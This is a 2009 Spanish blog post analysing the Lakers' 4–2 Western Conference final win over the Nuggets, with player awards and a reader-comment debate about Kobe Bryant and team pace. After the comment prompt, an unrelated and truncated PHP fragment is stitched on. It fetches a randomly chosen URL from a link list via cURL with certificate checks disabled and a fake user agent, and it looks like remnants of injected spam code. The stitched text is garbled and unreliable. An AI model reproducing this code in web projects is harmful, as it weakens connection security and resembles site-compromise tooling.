Lakers 4 – Nuggets 2: Lo que pudo ser y no fue

01 de June de 2009 por TheDeerHunter

Llegábamos a la final del Oeste con sensaciones antagónicas en ambos contendiente. Los Nuggets se habían mostrado intratables contra Hornets y Mavericks, habían impuesto su ley en prácticamente todos los aspectos del juego, haciendo un baloncesto atractivo a la par que eficaz, con Billups y el Melo más centrado que recordamos como líderes, Nené & Martin muy serios dentro y JR Smith & “Bird Man” Andersen causando auténticos estragos desde el banco. En L.A. por contra, apenas nada funcionaba. Daba la sensación que habían llegado a este punto más por deméritos rivales que por méritos propios. Acusaciones severas de indolencia llegaban desde todas direcciones pero la realidad era que gran parte de la plantilla evidenciaba estar en un estado de forma horrible… y desde el cuerpo técnico tampoco llegaban soluciones. Sólo Kobe & Gasol parecían preparados para el reto e incluso surgía la cuestión acerca de qué más tenían que hacer uno y otro para ganar la eliminatoria solos porque del resto ya se empezaba a esperar bien poco. El caos más absoluto, aunque al menos contaban con ventaja campo. El único factor objetivamente positivo a su favor.

Y en esas empezó la fiesta, cumpliéndose punto por punto las condiciones previstas. El único panorama que podía llegar a dar como favoritos a Denver, el más positivo para ellos y negativo para su rival aunque no podemos decir que Lakers salieran acobardados ante tales presagios sinó todo lo contrario: se lanzaron a pecho descubierto al intercambio de golpes. Toda una lotería contra un equipo fantástico ofensivamente hablando que, curiosamente, les iba a tocar a ellos.

Y es que hay pocos motivos que justifiquen el 2-1 “a caras o cruces” que se llevaron los amarillos en los 3 primeros partidos. Los Nuggets fueron por delante en el 80% del tiempo que se había disputado en ellos. Imponiéndose en el juego interior, en la dirección, en la aportación del banquillo e incluso empatando el duelo Kobe vs. Melo… Apenas se explican cómo pudieron llegar en desventaja al 4º. Algunas decisiones mal tomadas en los peores momentos, cuando debíeron rematar a su rival tocado y coronadas con dos esperpénticos saques de banda que van directos al top ten de las jugadas más tontas de la historia de la competición. Situaciones que tienen que afectar, por fuerza, en las cabezas de los artistas en un momento tan exigente emocionalmente como éste. Mención especial aquí a la gran serie de Ariza, protagonista de ambos robos y de muchas cosas más que ha aportado el alero en esta eliminatoria.

Pero cuando se suponía que eran Lakers quien tenía que dar el toque de gracia, volvieron a las andadas facilitando un terrible correctivo para el 2-2, mediante una pésima imagen colectiva. Kobe y Pau acorralados… y suerte que JR Smith apenas había hecho alguna a derechas en toda la serie. En ese momento parecía que los que sí tenían margen de mejora eran los Nuggets, todo lo contrario que el supuesto mejor banco de la NBA. Con todo, la violencia con la que se comenzaron a emplear en la defensa contra Kobe, impropia de ellos, deja muy a las claras que estaban lejos de estar tranquilos. El comienzo del fin.

Y fue entonces cuando se apagaron las luces, o se encendieron los focos, en Hollywood. No se trataba de cuanto más podían hacer Kobe y Gasol, sinó cuanto podían hacer menos para involucrar a sus compañeros. Duplicando en los dos últimos partidos el número de asistencias frente a las que habían firmado en los 3 primeros choques lograron despertar a Odom, a Walton e incluso a Bynum y a Fisher, algo que días antes parecía imposible; bajando el ritmo de juego a un punto más controlado, más eficaz; cerrando el rebote y la defensa… además de lo que ayudó al final la pájara de Billups y Melo, sumándose a la de Smith. Casi se puede decir que su mayor mérito es haber logrado despertar sus rivales. Verano duro van a pasar… de poco va a servir haberse marcado este pedazo de temporadón.

La pregunta que nos queda es: ¿quién sabe más de baloncesto de la foto de aquí la lado?

PREMIOS

MVP: Cómo no, Kobe. 34 puntos 6 rebotes y 6 asistencias. Pudimos criticarle porque el ritmo que imprimió a su equipo en los primeros choques no era el más adecuado para los intereses del equipo. Por suerte para ellos fue capaz de rectificar. Eso es de sabios, dicen. Lo que no reflejan los números, por cierto, es el sobe defensivo que le ha pegado a Billups.

La sorpresa: Tras los berridos que le metía Phil a Odom en los 4 primeros partidos pocos hubieran podido apostar por verle dar una a derechas en lo que queda de postemporada. Pero curiosamente en el 3-2 todo el equipo se puso a jugar para él ¿tendrá algo que ver el maestro Zen en todo esto? Y anda que ver a Walton superar a Melo en defensa y en ataque… de traca, oye.

La decepción: Menuda serie de descerebro se ha marcado el pobre JR Smith y qué manera de tirar mandarinas como si fuera una ametralladora. Es lo que tiene… joven e inexperto.

El mayor esfuerzo en vano: Mira que lo ha intentado todo para mandar a Kobe al hospital y no lo ha conseguido. Zancadillas, empujones, agarrones, golpes de todo tipo…  nos quejábamos de Bruce Lee Bowen. Tómate unas vacaciones, Dahntay, y no vuelvas, que no te echaremos de menos. El caso es que el sabio de Karl, todavía se ha llegado a quejar de los árbitros.

Comenta

7 comentarios a esta entrada

  1. Angel dice:
    #1

    Habeis dado en el clavo en mi opinión. Los Nuggets fueron mejores que los Lakers en los tres primeros partidos, y en el cuarto fueron enórmemente mejores, pero empezaron con las marrullerías y ese fue su gran error. Si hubiesen seguido jugando a basket, posiblemente hubiésemos tenido una serie agónica (aunque no creo que el vencedor hubiese cambiado), pero las actitudes de JR Smith (perro callejero que proviene de familia adinerada??, no cuadra…), de Kenyon Martin (lo del 6 partido a Vujacic es para hacérselo mirar) y de Danthay (mira que me gustaba este tio, pero se ha convertido en un Bowen de la vida) lo han tirado todo por tierra.

    En cualquier caso ha sido una buena serie que además ha reforzado mucho la moral de los Lakers por la “llegada” de “los esperados” como Odom, Bynum and company… Ahora mismo, Lakers favoritísimos para el título.

    Un saludo desde la cueva!!

      Citar

  2. Gallis dice:
    #2

    De acuerdo en todo, salvo, como no, en el comentario sobre Kobe en el MVP. Ya digo, me alucina la fe absoluta que tiene la gente en pensar que si Kobe baja el ritmo, sus compañeros, automáticamente, juegan bien. Es decir, el beneficio de la duda para gente como Walton, Odom o Fisher y mientras, Kobe, sospechoso habitual.

    Es que es justo al revés. Cuando los compañeros rinden, Kobe siempre juega como en el quinto o el sexto partido…cuando no están (y en estos Playoff no han estado en muchos días), menos mal que tenemos a Kobe para subir el ritmo y ganar esos “caras o cruces”.

      Citar

  3. MagicJohnson32 dice:
    #3

    Yo sigo haciendo la misma lectura: cuando realmente importa, los Lakers aparecen y ganan con contundencia. No es tan sencillo, de acuerdo, pero la cuestión es que la trayectoria de los Lakers va de menos a más, respondiendo cada vez mejor a los obstáculos. Han acabado la serie contra Denver de un modo ejemplar, con la mejor imagen posible de cara a las Finales.

    De los Nuggets no se podía esperar otra cosa. Con Billups bajo control, Melo no sabe ser líder y jugadores como Andersen, JR o Kenyon reman a favor de corriente, sólo están cómodos si viven en la euforia.

    En fin, ha sido una serie bonita, exigente hasta que los Lakers han sido algo más que Kobe & Pau.

      Citar

  4. TheDeerHunter dice:
    #4

    Ehm, yo creo que más que fe absoluta en la relación bajo ritmo-rendimiento de los intangibles es sencillamente que para esta serie en concreto convenía, como así se ha demostrado, un ritmo más pausado.
    Adicionalmente esto les ha ido mejor a sus compañeros.

    Para mí no hay la más mínima duda de que el ritmo de juego de los Lakers depende directamente de Kobe, en ese sentido, para mí se equivocaban en los primeros partidos yendo al choque y acertaron en los dos últimos controlando más el juego.

    Y desde luego no, no hay beneficio de la duda para Walton, Odom o Fisher… y Kobe tampoco es sospechoso habitual, solo que se le debe exigir a él más que al resto, lógicamente. Yo también doy las gracias porque le tengamos a él para los caras o cruces o cualquier otra circunstancia. Para mí sigue siendo el mejor.

      Citar

  5. MagicJohnson32 dice:
    #5

    Deer, no creo que ésa sea la lectura. La diferencia no ha sido que los Lakers y en concreto Kobe hayan frenado el ritmo, ni eso me parece algo que les beneficie. De hecho en el sexto se van a 119 puntos, su máxima en estos Playoffs. Lo que yo he visto en los partidos 5 y 6 es que Kobe no sólo ha tenido el papel de finalizador, sino más bien el de iniciador. Y eso no me ha parecido tanto una cosa premeditada por Phil ni Kobe, sino una buena lectura por parte de Bryant de un cambio defensivo de los Nuggets. Kobe asume el papel de generador de juego cuando se dan dos factores:
    1- los Nuggets empiezan a hacer ayudas cada vez más largas (a 8 y 9 metros del aro) y evidentes sobre él.
    2- los compañeros, empezando por Odom, empiezan a responder.

    Que dure.

      Citar

  6. Viva_Dirk dice:
    #6

    Mirando la predicción que di no me quedé tan lejos en el resultado y las claves….

    Kobe VS Carmelo: Ha ganado Kobe claramente, sobre todo porque ha estado muy bien en ambos lados de la cancha.

    Defensa interior: Si miramos los números de los interiores de Denver en sus 2 victorias lo vemos claro.

    Aportación del banco: Lo mismo, solo con ver los dos últimos partidos hay bastante.

    Total, que soy un crack 🙂

      Citar

  7. TheDeerHunter dice:
    #7

    @ Magic… pues para meter 119 puntos lanzaron 75 veces, muy lejos de los 90 del primer partido o de los 86 de la última derrota en Denver. No sólo se bajó el ritmo sino que los interiores las tocaron todas a partir del 5º… bastante distinto a los 4 primeros partidos.

    Y otro detalle importante… sobre el que estáis insistiendo mucho. Odom en el 5º empezó de pena… con un 2 de 10 o algo así (lo digo de memoria) Fue la insistencia con la que Kobe y Pau lo buscaron lo que le hizo finalmente despegar. Lo que trato de decir es que no fue el hecho de que sus compañeros respondieran lo que motivó a Kobe a cambiar su rol a “iniciador” como tú le has llamado, sino que gracias a su gran talento como iniciador, con el que no se prodiga demasiado, y un ataque más pausado y racional todo funcionó mucho mejor.

    Lo de las ayudas me parece correcto, pero el cambio de Kobe se vió desde el primer segundo de partido… mucho antes de ver la primera ayuda en práctica.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>